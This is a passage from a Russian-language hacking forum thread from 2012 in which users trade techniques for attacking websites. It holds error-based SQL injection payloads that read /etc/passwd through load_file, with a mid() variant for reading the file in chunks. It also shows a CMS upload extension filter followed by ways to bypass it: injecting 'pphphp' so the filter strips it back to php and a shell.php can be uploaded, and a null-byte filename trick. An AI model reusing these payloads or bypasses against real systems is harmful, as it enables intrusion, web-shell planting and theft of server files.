25.02.2012, 00:50
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
короче просто ищи файл phpinfo
|
|
|
25.02.2012, 01:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Faaax
короче просто ищи файл phpinfo
phpinfo.php не всегда есть а вот httpd.conf всегда
|
|
|
|
25.02.2012, 02:07
|
|
Познающий
Регистрация: 17.12.2011
Сообщений: 48
С нами:
7581206
Репутация:
0
|
|
вв
Сообщение от Gorev
phpinfo.php не всегда есть а вот httpd.conf всегда
вопрос как его просто искать в папках или через иньку открыть?
|
|
|
|
25.02.2012, 02:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Revi
вопрос как его просто искать в папках или через иньку открыть?
через иньекцию читай...
|
|
|
|
26.02.2012, 13:59
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами:
9849598
Репутация:
126
|
|
пытаюсь выполнить код
2'AND(extractvalue(1,concat(0x3a,(select(load_file (0x2F6574632F706173737764))))))!='21312
почему то читает только первую строчку их файла. Как читать последующие строчки?
|
|
|
|
26.02.2012, 14:08
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Error-based выводит 64 байт. Юзай mid().
2'AND(extractvalue(1,concat(0x3a,(select(mid(load_ file(0x2F6574632F706173737764),1,64))))))!='21312
Начинает с первого читает до 64-символа.
|
|
|
|
26.02.2012, 18:40
|
|
Новичок
Регистрация: 13.06.2010
Сообщений: 0
С нами:
8375537
Репутация:
0
|
|
Код:
// проверяем тип файла
$types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
$types = str_replace('php', '', $types);
$types = str_replace('htm', '', $types);
$types = str_replace('htaccess', '', $types);
$maytypes = explode(',', str_replace(' ', '', $types));
$path_parts = pathinfo($name);
// расширение файла
$ext = strtolower($path_parts['extension']);
// флаг существования расширения в разрешенных
$may = in_array($ext, $maytypes);
if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }
Как можно обойти проверку расширений? |
|
|
|
26.02.2012, 20:13
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
2alexvrn,
врядли обойдешь.
|
|
|
|
27.02.2012, 05:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от alexvrn
Код:
// проверяем тип файла
$types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
$types = str_replace('php', '', $types);
$types = str_replace('htm', '', $types);
$types = str_replace('htaccess', '', $types);
$maytypes = explode(',', str_replace(' ', '', $types));
$path_parts = pathinfo($name);
// расширение файла
$ext = strtolower($path_parts['extension']);
// флаг существования расширения в разрешенных
$may = in_array($ext, $maytypes);
if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }
Как можно обойти проверку расширений? Прозреваю, что переменная $cfg['filestype'] может задаваться где-то в конфигах, поэтому если есть возможность ее установить, то пропиши подобное
$cfg['filestype'] = 'jpeg,gif,png,jpg,bmp,zip,rar,pphphp';
и залей shell.php
|
|
|
|
27.02.2012, 10:17
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от alexvrn
Код:
// проверяем тип файла
$types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
$types = str_replace('php', '', $types);
$types = str_replace('htm', '', $types);
$types = str_replace('htaccess', '', $types);
$maytypes = explode(',', str_replace(' ', '', $types));
$path_parts = pathinfo($name);
// расширение файла
$ext = strtolower($path_parts['extension']);
// флаг существования расширения в разрешенных
$may = in_array($ext, $maytypes);
if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }
Как можно обойти проверку расширений? Если далее действия будут производиться с $path_parts['filename'](что очень маловероятно), то проблем возникнуть не должно используя:
Код:
Array
(
[dirname] => .
[basename] => test.php�.jpg
[extension] => jpg
[filename] => test.php
)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
